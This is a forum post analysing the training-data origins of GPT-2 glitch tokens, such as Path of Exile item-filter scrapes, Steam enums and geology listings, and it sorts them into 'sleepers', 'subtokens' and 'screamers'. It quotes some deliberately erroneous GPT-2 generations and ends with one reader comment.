"Promenade" "Shore" "Spider Forest" "Tunnel" "Phantasmagoria" SetFontSize 35 PlayAlertSound 4 200 Show # Maps:T5 Class "Maps" BaseType "Bog Map" "Coves" "Graveyard" "Pier" "Underground Sea" "Villa Map" SetFontSize 36 PlayAlertSound 4 200 Show # Maps:T6 Class "Maps" BaseType "Arachnid" "Catacomb" "Colon', 'e "Bog Map" "Coves" "Graveyard" "Pier" "Underground Sea" "Villa Map" SetFontSize 36 PlayAlertSound 4 200 Show # Maps:T6 Class "Maps" BaseType "Arachnid" "Catacomb" "Colonnade" "Dry Woods" "Strand" "Temple" SetFontSize 38 PlayAlertSound 4 200 Show # Maps:T7 Class "Maps" BaseType "Jungle Valley" "Terrace" "Torture Chamber" "Waste Pool" "Abandoned Cavern" SetFontSize 40 PlayAlertSound 4 300 Show # Maps:T8 Class "Maps" BaseType "Canyon" "Cells" "Dark Forest" "Dry Peninsula" "Orchard" SetFontSize 41 PlayAlertSound 4 300 Show # Maps:T9 Class "Maps" BaseType "Arid Lake" "Gorge" "Residence" "Underground River" "Malformation" SetFontSize 41 PlayAlertSound 4 300 Show # Maps:T10 Class "Maps" BaseType "Bazaar" "Necropolis" "Plateau" "Volcano" "Chateau" SetFontSize 42 PlayAlertSound 4 300 Show # Maps:T11 Class "Maps" BaseType "Academy" "Crematorium" "Precinct" "Springs" SetFontSize 42 PlayAlertSound 4 300 Show # Maps:T12 Class "Maps" BaseType "Arsenal" "Overgrown Ruin" "Shipyard" "Village Ruin" SetTextColor 0 0 0 SetBackgroundColor 200 200 200 SetBorderColor 0 0 0 SetFontSize 43 PlayAlertSound 4 300 Show # Maps:T13 Class "Maps" BaseType "Courtyard" "Excavation" "Wasteland" "Waterways" SetTextColor 0 0 0 SetBackgroundColor 200 200 200 SetBorderColor 0 0 0 SetFontSize 44 PlayAlertSound 4 300 Show # Maps:T14 Class "Maps" BaseType "Shrine" "Conservatory" "Palace" "Plaza" "Vaal Temple" SetTextColor 0 0 0 SetBackgroundColor 200 200 200 SetBorderColor 0 0 0 SetFontSize 45 PlayAlertSound 4 300 Show # Maps:T15 Class "Maps" BaseType "Abyss" "Colosseum" "Core" SetTextColor 0 0 0 SetBackgroundColor 255 255 255 SetBorderColor 0 0 0 SetFontSize 45 PlayAlertSound 6 300 Show Class "Maps" SetFontSize 44 PlayAlertSound 4 300 Show Class "Map Fragments" BaseType "Mortal Hope" SetTextColor 0 0 0 SetBackgroundColor 255 255 255 SetBorderColor 0 0 0 SetFontSize 45 PlayAlertSound 6 300 Show Class "Map Fragments" BaseType "Eber\'s Key" "Yriel\'s Key" "Inya\'s Key" "Volkuur\'s Key" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Map Fragments" BaseType "Sacrifice at Midnight" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Map Fragments" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 38 PlayAlertSound 4 300 # Section: 0300 # CURRENCY Show BaseType "Eternal Orb" "Divine Orb" "Exalted Orb" "Albino Rhoa Feather" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show BaseType "Regal Orb" "Orb of Regret" "Chaos Orb" "Blessed Orb" "Gemcutter\'s Prism" "Orb of Fusing" "Orb of Scouring" "Orb of Alchemy" "Glassblower\'s Bauble" "Vaal Orb" "Cartographer\'s Chisel" "Stacked Deck" SetTextColor 0 0 0 SetBackgroundColor 213 159 15 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show BaseType "Orb of Chance" "Orb of Alteration" "Chromatic Orb" "Jeweller\'s Orb" SetTextColor 190 178 135 SetBorderColor 190 178 135 135 SetFontSize 38 Show BaseType "Portal Scroll" "Scroll of Wisdom" SetTextColor 170 158 130 220 SetBorderColor 0 0 0 Show BaseType "Scroll Fragment" SetTextColor 170 158 130 165 SetFontSize 29 Show Class "Divination" BaseType "House of Mirrors" "Wealth and Power" "The Dragon\'s Heart" "The Brittle Emperor" "Celestial Justicar" "Dark Mage" "Doctor" "Fiend" "The Queen" "The Artist" "The Last One Standing" "The Artist" "Bowyer\'s Dream" "Hunter\'s Reward" "The Thaumaturgist" "The Warlord" "The Offering" "The Ethereal" "The Dapper Prodigy" "Abandoned Wealth" "The Enlightened" "Last Hope" "The Devastator" "The Immortal" "The Aesthete" "The Hunger" "Pride Before the Fall" "The King\'s Heart" "Lysah\'s Respite" "Cursed King" "Time-Lost Relic" SetTextColor 0 0 255 SetBackgroundColor 255 255 255 SetBorderColor 0 0 255 SetFontSize 45 PlayAlertSound 6 300 Show Class "Divination" BaseType "The Risk" "Chains that Bind" "The Road to Power" "The Watcher" "Merciless', 'ype "Sacrifice at Midnight" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Map Fragments" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 38 PlayAlertSound 4 300 # Section: 0300 # CURRENCY Show BaseType "Eternal Orb" "Divine Orb" "Exalted Orb" "Albino Rhoa Feather" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show BaseType "Regal Orb" "Orb of Regret" "Chaos Orb" "Blessed Orb" "Gemcutter\'s Prism" "Orb of Fusing" "Orb of Scouring" "Orb of Alchemy" "Glassblower\'s Bauble" "Vaal Orb" "Cartographer\'s Chisel" "Stacked Deck" SetTextColor 0 0 0 SetBackgroundColor 213 159 15 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show BaseType "Orb of Chance" "Orb of Alteration" "Chromatic Orb" "Jeweller\'s Orb" SetTextColor 190 178 135 SetBorderColor 190 178 135 135 SetFontSize 38 Show BaseType "Portal Scroll" "Scroll of Wisdom" SetTextColor 170 158 130 220 SetBorderColor 0 0 0 Show BaseType "Scroll Fragment" SetTextColor 170 158 130 165 SetFontSize 29 Show Class "Divination" BaseType "House of Mirrors" "Wealth and Power" "The Dragon\'s Heart" "The Brittle Emperor" "Celestial Justicar" "Dark Mage" "Doctor" "Fiend" "The Queen" "The Artist" "The Last One Standing" "The Artist" "Bowyer\'s Dream" "Hunter\'s Reward" "The Thaumaturgist" "The Warlord" "The Offering" "The Ethereal" "The Dapper Prodigy" "Abandoned Wealth" "The Enlightened" "Last Hope" "The Devastator" "The Immortal" "The Aesthete" "The Hunger" "Pride Before the Fall" "The King\'s Heart" "Lysah\'s Respite" "Cursed King" "Time-Lost Relic" SetTextColor 0 0 255 SetBackgroundColor 255 255 255 SetBorderColor 0 0 255 SetFontSize 45 PlayAlertSound 6 300 Show Class "Divination" BaseType "The Risk" "Chains that Bind" "The Road to Power" "The Watcher" "Merciless Armament" "The Surveyor" "Rats" "The Vast" "Chaotic Disposition" "Heterochromia" "The Harvester" "The Wind" "Emperor of Purity" "The Mercenary" SetTextColor 0 0 0 SetBackgroundColor 0 210 255 SetBorderColor 0 0 255 SetFontSize 44 PlayAlertSound 1 300 Show Class "Divination" BaseType "The Throne" "Tranquillity" "The Pack Leader" "The Spoiled Prince" "Glimmer" "The Demoness" "The Drunken Aristocrat" "The Fletcher" "Avenger" "Earth Drinker" "The Arena Champion" "The Trial" "Grave Knowledge" "Encroaching Darkness" "Doedre\'s Madness" "Humility" "The Union" "Lucky Connections" "Jack in the Box" "The Inventor" "Hope" "The Hoarder" "Gemcutter\'s Promise" "The Explorer" "Blind Venture" "The Cartographer" "Scholar of the Seas" "Volatile Power" "Lost Worlds" "The Body" "Birth of the Three" "Vinia\'s Token" "The Sigil" "Boundless Realms" "The Stormcaller" "The Lunaris Priestess" "The Jester" "Cartographer\'s Delight" SetTextColor 0 0 0 SetBackgroundColor 110 215 230 235 SetBorderColor 0 110 255 SetFontSize 40 PlayAlertSound 1 300 Show Class "Divination" BaseType "Carrion Crow" "Other Cheek" SetTextColor 0 0 0 SetBackgroundColor 175 215 230 200 SetBorderColor 0 0 0 SetFontSize 32 Show Class "Divination" SetTextColor 0 0 0 SetBackgroundColor 145 215 230 225 SetBorderColor 0 100 215 SetFontSize 38 PlayAlertSound 1 300 Show Class "Currency" BaseType "Prophecy" SetTextColor 0 0 0 SetBackgroundColor 159 15 213 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show Class "Currency" BaseType "Silver Coin" SetTextColor 0 0 0 SetBackgroundColor 190 178 135 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 1 300 Show Class "Currency" BaseType "Perandus" SetTextColor 255 178 135 SetBorderColor 255 178 135 135 SetFontSize 38 Show Class "Currency" SetBorderColor 0 0 0 Show Class "Stackable" "Currency" SetBorderColor 0 0 0 # Section: 0400 # SOCKET/LINK BASED stuff # 5-links (6 links are handled at the start) Show LinkedSockets = 5 SetBorderColor 0 255 255 SetFontSize 39 PlayAlertSound 1 300 # 6-Sockets Show ItemLevel >= 75 Rarity = Rare Sockets = 6 SetTextColor 255 190 0 SetBackgroundColor ', ' 255 SetFontSize 44 PlayAlertSound 1 300 Show Class "Divination" BaseType "The Throne" "Tranquillity" "The Pack Leader" "The Spoiled Prince" "Glimmer" "The Demoness" "The Drunken Aristocrat" "The Fletcher" "Avenger" "Earth Drinker" "The Arena Champion" "The Trial" "Grave Knowledge" "Encroaching Darkness" "Doedre\'s Madness" "Humility" "The Union" "Lucky Connections" "Jack in the Box" "The Inventor" "Hope" "The Hoarder" "Gemcutter\'s Promise" "The Explorer" "Blind Venture" "The Cartographer" "Scholar of the Seas" "Volatile Power" "Lost Worlds" "The Body" "Birth of the Three" "Vinia\'s Token" "The Sigil" "Boundless Realms" "The Stormcaller" "The Lunaris Priestess" "The Jester" "Cartographer\'s Delight" SetTextColor 0 0 0 SetBackgroundColor 110 215 230 235 SetBorderColor 0 110 255 SetFontSize 40 PlayAlertSound 1 300 Show Class "Divination" BaseType "Carrion Crow" "Other Cheek" SetTextColor 0 0 0 SetBackgroundColor 175 215 230 200 SetBorderColor 0 0 0 SetFontSize 32 Show Class "Divination" SetTextColor 0 0 0 SetBackgroundColor 145 215 230 225 SetBorderColor 0 100 215 SetFontSize 38 PlayAlertSound 1 300 Show Class "Currency" BaseType "Prophecy" SetTextColor 0 0 0 SetBackgroundColor 159 15 213 SetBorderColor 0 0 0 SetFon

 

43177 EStreamFrame 0 |  39906 EStream 0

GPT2 was very insistant that these were some sort of code. "EStream" in particular always continued as "EStreamControl".

'EStreamFrameEventStart at 42798.88ms, delta: 0.00ms k_EStreamFrame'

Turns out it's part of a Python Steam library module called enums.

 

41383 assetsadobe 0

Always continues as "assetsadobe.com/is/image/content/dam/tnc/nature/en/photos".

A Google search showed that it's a common on nature.org. 

Nature.org is probably also the source of the "natureconservancy" glitch token.

 

Non-English Languages

There is surprisingly little bi-lingual text for Russian and English in the dataset. Most Russian is just present as large chunks of entirely Russian text. Wikipedia text is occasionally bilingual, which means that ignoring the Russian portion likely increases accuracy for English token prediction.

Note that it isn't just "к" that is a glitch token. Other letters like "и" also have the same property. Russia is also generally rare in the training data - some Cyrillic characters are multi-token. 

This is something that also applies to other languages, like Japanese. Also note that Chinese text was almost certainly intentionally excluded from the tokenizer training set - the full-size comma "," required 3 tokens, even though it is arguably the most common form of Chinese punctuation! This does not apply to punctuation also common in Japanese like "、" and "。", both being single-token. Although Wikipedia and some other sources will claim that Japanese also uses the full-size comma, it was extremely rare in the dataset. 

 

Hypotheses

Why does this happen?

Firstly, my intuition about low-frequency tokens often being glitch tokens proved true - to a degree. It wasn't just raw frequency, but rather frequency in context. If a particular token doesn't provide extra information about following tokens, GPT2 will be trained to place less attention to them. 

Take the following example:

Tengu (天狗) is a type of bird common in Japanese mythology.

At GPT2's level of capability, "天狗" (Tengu in Chinese/Japanese) doesn't provide extra information compared to "Tengu" or other english words around it. It learns (rightfully) to ignore Japanese text in the middle of English text. In fact, this means it should treat such tokens as null, not even blank space. All the attention vectors from the rest of the prompt should be shifted one token forwards, as though the glitch token never existed. This is the behavior we in fact observe!

Now consider the testing condition:

What is "天狗"?

All the other tokens are pointing towards the location of "天狗", greatly increase its impact on subsequent token generated. At this point one of three things happens: 

  1. The model acts like the glitch token doesn't exist
  2. The model treats small perturbations in the glitch token as signal, resulting in non-sensical responses, often something close to the model centroid as described here.
  3. The model picks up contextual associations of the glitch token (its "vibes") and gives a vague response in that direction. For example, Cyrilic characters are refered to as "something Russian", while ⓘ, strongly associated with geological data, is called "a geological term which...".

Let's take the glitch token set of "ÃÂÃÂ" and friends. They almost never convey information in any context. We would expect them to do only two things:

  1. Increase the likelihood of more "ÃÂÃÂ" (and longer/shorter variants) in generated text.
  2. Be otherwise completely ignored.

This is also the exact behavior we observe!

prompts: 
" Paris is theÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ capital of"
" Paris is the capital of"

GPT2 generations

" Paris is theÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ capital of the world's largest and most populous Arab country, and is one of the largest cities in the world with an area of 1.6 million people (more than half of them in Paris alone). It is home to"
" Paris is the capital of France, and its capital is Paris. The French capital has a population of about 6.5 billion (more than half of the world's population), which is a huge number for a city of this size. In Paris"
" Paris is theÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ capital of France, the largest state in France and one of the wealthiest in the world. The capital of Paris is home to over 1.2 billion people, and the country's economy is growing at a rapid clip. It"
' Paris is the capital of the European Union. Its population is about 3,500, and it has been under EU sanctions for more than a year. The EU\'s top diplomat has described the bloc as "a global power".\n\nFrance\'s'

 

 

I would also go further and say that this is the default behavior for any token which either doesn't convey information in a particular context or doesn't appear in the training set at all. So much of the internet is something like:

"bitcoin is currently less than 3% of just the available cash on hand at Apple.In the \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\xe2\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x80\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x9cThink Different\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\xe2\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x80\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\x9d advertisements, we see black and white images from some of"

Where the best way to predict the next natural language token is to ignore anything that doesn't belong in natural language, pass the information that is present in natural language tokens through the glitch tokens as though the glitch tokens aren't there, and use that information to predict further natural language tokens. This is pretty much what we observe.

I also have a hypothesis that having your vocabulary include tokens which look long and unnatural in natural language helps mitigate catastrophic forgetting. Imagine that your training data for coding include a lot of a function named "rawdownloadcloneembedreportprint". If you tokenize it as several English words, the relationship between them in natural language will begin to break down as the model encounters more coding data with that function. Tokenizing it as a single token helps prevent this.

There are also a subset of glitch tokens which tend to "take over" when encountered in natural language. They tend to occur in a context with a lot of natural language tokens, but in an unusual distribution. An example is <45563 'ⓘ' 27>[2], which was mostly present in a long list of something geology-related (list of geological surveys?). In the context of "What is the meaning of", it'll either give a vague but coherent geology-related answer, or go back to listing geological surverys. This behavior also occurs for "petertodd"/"ertodd" and crypto spam. GPT2 is able to tell that they vaguely belong in natural language, but they have such a strong influence on the following text that they often "take over". This behavior decreases as model size increases, with "ertodd" consistantly displaying this behavior on the smallest GPT2 model, but rarely on the largest.

I am now very confused why all the other talk about glitch tokens (including my own, from just a week ago!) sound so confused. This seems very simple and intuitive and I am utterly shocked I haven't seen anyone else write this exact analysis. It probably exists out there, and I just haven't seen it.

tldr; glitch tokens are ignored because they don't convery information in the use context. Information is passed through them as though they don't exist. This sounds extremely obvious in hindsight.

 

 

Glitch token classifications

In conclusion, I think we can divide glitch tokens into 3 main categories.

  1. Sleepers. They are only called upon in specific circumstances, and are treated as non-existent in others. (e.g. short ASCII art, "A" spam, some code elements). This is the largest category of glitch tokens by far.
  2. Subtokens. BPE encoding artifacts (" practition") and tokens which rarely appear away from a particular pattern (" godd" as part of " goddammit"/" goddamned"). The former is generally because of infrequency in the training set. The latter may be due to the relevant information being split across multiple tokens in a human-unintuitive way.
  3. Screamers. These have a very strong prior that was very rarely violated in the training data. Often overpowers the influence of all other tokens when they are shown out of context (e.g. ⓘ). This is especially true if surrounding tokens induce a "spotlight" effect where they increase the attention paid to the Screamer (e.g. "What is the nature of ⓘ?"). Decreases in frequency as model size increases. 

 

Future Research Plans

I'm currently using interpretability tools to identify the exact changes glitch tokens cause to generated text.

 

 

Addendum: The SCP hypothesis

Where on the internet is an "information-less" token often times present somewhere you would expect a normal (coversational) word?

That's right, SCP articles. 

Researcher Calvin: ████████ ████? The man who created you? SCP-2785: Correct, though I like to think of ████████ as my father. He made me so he could have a child, I believe, who could carry on his legacy. I feel like I owe it to ████████ for bringing me into this world, despite the cost… Researcher Calvin: Are you referring to [DATA EXPUNGED]? SCP-2785: Yes, [DATA EXPUN

This might explain why a direct iterogative of " What is the nature of <glitch token>?" sometimes results in a creepy/unnerving/existential answer.

I'm only including this because it's funny, but I only give <1% probability that this has a significant effect.

  1. ^

    I'm counting utf-8 control characters as resolved here, but those honestly need their own post. 

  2. ^

    Looks like scrapes from https://www.mindat.org/?

    Example text from OpenWebText:

    Lowville quartz locality Walter, M., Chamberlain, S.C. (2013) The Lowville quartz occurrence, Lewis County, NY. The 40th Rochester Mineralogical Symposium, Contributed Papers in Specimen Mineralogy, 29-30.\n\nNorth Carolina Gaston Co. ⓘ Crowders Mountain State Park Espenshade, Gilbert H. and Potter, Donald B. (1960) Kyanite,Sillimanite And Andalusite Deposits of the Southeastern States: Geological Survey Professional Paper 336\n\nOregon Lane Co. Black Butte District ⓘ Hobart Butte Am Min (1948) 33:122-134\n\nPennsylvania Schuylkill Co. New Castle Township ⓘ Wadesville Tom Loomis specimen; Alfredo Petrov specimens; Collected by James J. "Skip" Colflesh, 2007.\n\nUtah Beaver Co. San Francisco Mts ⓘ San Francisco District (Frisco District) Petersen, Erich U., (2001) Porphyry Cu-Style Mineralization Potential In The San Francisco District, Ut. GSA Annual Meeting, November 5-8, 2001\n\nJuab Co. East Tintic Mts Tintic District ⓘ Mintintic Mine American Mineralogist, Volume 30, pages 76-77\n\nⓘ White Hi', ' District NBMG Spec. Pub. 31 Minerals of Nevada\n\nNew Hampshire Ches

New Comment
1 comment, sorted by Click to highlight new comments since:

I laughed out loud at the SCP hypothesis. Love it. What a warped mirror the Shoggoths hold up to us, casting back unexpected pieces of our own behaviors in strange contexts.

Satisfying to see these glitch issues tracked down to their sources. Nice work.